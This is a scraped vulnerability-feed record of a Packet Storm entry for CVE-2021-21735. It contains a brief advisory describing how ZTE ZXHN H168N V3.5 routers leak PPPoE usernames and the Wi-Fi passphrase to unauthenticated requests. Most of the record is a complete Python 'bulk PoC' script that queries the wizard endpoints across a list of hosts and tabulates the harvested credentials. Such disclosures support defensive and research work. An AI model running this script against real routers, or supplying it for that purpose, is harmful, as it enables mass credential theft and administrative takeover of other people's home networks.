{“lastseen”:”2026-05-26T15:59:48″,”description”:”The ZTE ZXHN H168N V3.5 firmware exposes quick-setup wizard endpoints that return PPPoE credentials ADUsername, VDUsername and the WLAN KeyPassphrase via the GetPassword action without requiring authentication. The firmware routing allowlists these…”,”published”:”2026-05-26T00:00:00″,”modified”:”2026-05-26T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 ZTE ZXHN H168N 3.5 Credential Disclosure”,”source”:””,”references”:””,”id”:”PACKETSTORM:221998″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2021-21735″],”sourceData”:”—–BEGIN SECURITY ADVISORY—–\\n \\n Advisory ID: MONX-2021-001\\n CVE ID: CVE-2021-21735\\n Title: ZTE ZXHN H168N V3.5 – Unauthenticated Wizard Credential\\n Disclosure to Full Admin Compromise\\n Affected: ZTE ZXHN H168N V3.5\\n Date: 2026-05-20\\n Author: Mina Nageh Salalma (Monx Research)\\n Contact: minanageh379@gmail.com\\n Public URL:\\n https:\/\/github.com\/minanagehsalalma\/cve-2021-21735-zte-zxhn-h168n-admin-compromise\\n MITRE: https:\/\/www.cve.org\/CVERecord?id=CVE-2021-21735\\n \\n \\n VULNERABILITY DESCRIPTION\\n ————————–\\n The ZTE ZXHN H168N V3.5 firmware exposes quick-setup wizard endpoints that\\n return PPPoE credentials (ADUsername, VDUsername) and the WLAN KeyPassphrase\\n via the GetPassword action without requiring authentication. The firmware\\n routing allowlists these endpoints through a QuickSetupEnable branch.\\n \\n In ISP-deployed configurations where the Wi-Fi password is reused as the\\n default admin password, this credential disclosure is a full admin\\n compromise\\n chain requiring a single unauthenticated HTTP request.\\n \\n A bulk PoC script (zte_zxhn_h168n_bulk_poc.py) is included in the repository\\n for verifying scale of exposure. (packet storm attached at bottom)\\n \\n CREDITS\\n ——-\\n Mina Nageh Salalma (Monx Research)\\n https:\/\/github.com\/minanagehsalalma\\n \\n —–END SECURITY ADVISORY—–\\n \\n \\n \\n — packet storm attached poc —\\n import argparse\\n import asyncio\\n import html\\n import re\\n from pathlib import Path\\n \\n import aiohttp\\n from colorama import Fore, Style, init\\n \\n \\n DEFAULT_INPUT_PATH = Path(\\”urls.txt\\”)\\n PASSWORD_FORM = {\\n \\”IF_ACTION\\”: \\”GetPassword\\”,\\n \\”_InstID_PASS\\”: \\”DEV.WIFI.AP1.PSK1\\”,\\n \\”PASSTYPE\\”: \\”PSK\\”,\\n }\\n TABLE_TEMPLATE = \\”{:\\u003c3} | {:\\u003c34} | {:\\u003c30} | {:\\u003c30} | {:\\u003c30} | {:\\u003c25}\\”\\n HEADERS = [\\”#\\”, \\”URL\\”, \\”AD Username\\”, \\”VD Username\\”, \\”ESSID\\”, \\”Wi-Fi Password\\”]\\n AD_USERNAME_PATTERN = r\\”\\u003cADUsername\\u003e(.*?)\\u003c\/ADUsername\\u003e\\”\\n VD_USERNAME_PATTERN = r\\”\\u003cVDUsername\\u003e(.*?)\\u003c\/VDUsername\\u003e\\”\\n ESSID_PATTERN = r\\”\\u003cParaName\\u003e\\\\s*ESSID\\\\s*\\u003c\/ParaName\\u003e\\\\s*\\u003cParaValue\\u003e\\\\s*(.*?)\\\\s*\\u003c\/ParaValue\\u003e\\”\\n PASSWORD_PATTERN = r\\”\\u003cParaName\\u003eKeyPassphrase\\u003c\/ParaName\\u003e\\\\s*\\u003cParaValue\\u003e(.*?)\\u003c\/ParaValue\\u003e\\”\\n \\n init()\\n \\n \\n def parse_args() -\\u003e argparse.Namespace:\\n parser = argparse.ArgumentParser(\\n description=\\”Bulk PoC for CVE-2021-21735 against ZTE ZXHN H168N wizard endpoints.\\”\\n )\\n parser.add_argument(\\n \\”-i\\”,\\n \\”–input\\”,\\n type=Path,\\n default=DEFAULT_INPUT_PATH,\\n help=\\”Path to a newline-delimited host list.\\”,\\n )\\n parser.add_argument(\\n \\”–timeout\\”,\\n type=int,\\n default=10,\\n help=\\”Per-host request timeout in seconds.\\”,\\n )\\n return parser.parse_args()\\n \\n \\n def extract(pattern: str, text: str, default: str = \\”\\”) -\\u003e str:\\n match = re.search(pattern, text, re.DOTALL)\\n if not match:\\n return default\\n return html.unescape(match.group(1).strip())\\n \\n \\n def load_hosts(input_path: Path) -\\u003e list[str]:\\n return [line.strip() for line in input_path.read_text(encoding=\\”utf-8\\”).splitlines() if line.strip()]\\n \\n \\n async def fetch_text(session: aiohttp.ClientSession, method: str, url: str, **kwargs) -\\u003e str:\\n async with session.request(method, url, **kwargs) as response:\\n response.raise_for_status()\\n return await response.text()\\n \\n \\n async def extract_router_secrets(session: aiohttp.ClientSession, host: str) -\\u003e dict[str, str]:\\n base_url = f\\”http:\/\/{host}\/wizard_page\\”\\n \\n try:\\n pppoe_xml = await fetch_text(session, \\”GET\\”, f\\”{base_url}\/wizard_pppoe_lua.lua\\”)\\n wlan_xml = await fetch_text(session, \\”GET\\”, f\\”{base_url}\/wizard_wlan_config_lua.lua\\”)\\n password_xml = await fetch_text(\\n session,\\n \\”POST\\”,\\n f\\”{base_url}\/wizard_wlan_config_lua.lua\\”,\\n data=PASSWORD_FORM,\\n )\\n except Exception:\\n return {\\n \\”URL\\”: host,\\n \\”AD Username\\”: \\”\\”,\\n \\”VD Username\\”: \\”\\”,\\n \\”ESSID\\”: \\”\\”,\\n \\”Wi-Fi Password\\”: \\”\\”,\\n }\\n \\n return {\\n \\”URL\\”: host,\\n \\”AD Username\\”: extract(AD_USERNAME_PATTERN, pppoe_xml),\\n \\”VD Username\\”: extract(VD_USERNAME_PATTERN, pppoe_xml),\\n \\”ESSID\\”: extract(ESSID_PATTERN, wlan_xml),\\n \\”Wi-Fi Password\\”: extract(PASSWORD_PATTERN, password_xml)[:64],\\n }\\n \\n \\n def print_header() -\\u003e None:\\n header = TABLE_TEMPLATE.format(\\n \\”#\\”,\\n Fore.RED + HEADERS[1],\\n Fore.GREEN + HEADERS[2],\\n Fore.YELLOW + HEADERS[3],\\n Fore.BLUE + HEADERS[4],\\n Fore.MAGENTA + HEADERS[5] + Style.RESET_ALL,\\n )\\n separator = Fore.CYAN + \\”-\\” * len(header) + Style.RESET_ALL\\n print(separator)\\n print(header + \\”|\\”)\\n print(separator)\\n \\n \\n def print_row(index: int, row: dict[str, str]) -\\u003e None:\\n rendered = TABLE_TEMPLATE.format(\\n str(index),\\n Fore.RED + row[\\”URL\\”],\\n Fore.GREEN + row[\\”AD Username\\”],\\n Fore.YELLOW + row[\\”VD Username\\”],\\n Fore.BLUE + row[\\”ESSID\\”],\\n Fore.MAGENTA + row[\\”Wi-Fi Password\\”] + Style.RESET_ALL,\\n )\\n separator = Fore.CYAN + \\”-\\” * len(rendered) + Style.RESET_ALL\\n print(rendered + \\”|\\”)\\n print(separator)\\n \\n \\n async def run_bulk_poc(input_path: Path, timeout_seconds: int) -\\u003e None:\\n hosts = load_hosts(input_path)\\n seen: set[tuple[str, str, str, str, str]] = set()\\n results: list[dict[str, str]] = []\\n \\n print_header()\\n \\n timeout = aiohttp.ClientTimeout(total=timeout_seconds)\\n async with aiohttp.ClientSession(timeout=timeout) as session:\\n tasks = [asyncio.create_task(extract_router_secrets(session, host)) for host in hosts]\\n \\n for task in asyncio.as_completed(tasks):\\n try:\\n row = await task\\n except Exception as error:\\n print(f\\”{Fore.RED}Error: {error}{Style.RESET_ALL}\\”)\\n continue\\n \\n identity = (\\n row[\\”URL\\”],\\n row[\\”AD Username\\”],\\n row[\\”VD Username\\”],\\n row[\\”ESSID\\”],\\n row[\\”Wi-Fi Password\\”],\\n )\\n if identity in seen:\\n continue\\n \\n seen.add(identity)\\n results.append(row)\\n print_row(len(results), row)\\n \\n \\n def main() -\\u003e None:\\n args = parse_args()\\n asyncio.run(run_bulk_poc(args.input, args.timeout))\\n \\n \\n if __name__ == \\”__main__\\”:\\n main()”,”sourceHref”:”https:\/\/packetstorm.news\/download\/221998″,”cvss”:{“score”:6.5,”severity”:”MEDIUM”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:H\/I:N\/A:N”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/221998\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2026-05-26T15:59:48″,”description”:”The ZTE ZXHN H168N V3.5 firmware exposes quick-setup wizard endpoints that return PPPoE credentials ADUsername, VDUsername and the WLAN KeyPassphrase via the GetPassword action without…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,26,12,21,13,53,7,11,5],"class_list":["post-56966","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-65","tag-exploit","tag-medium","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n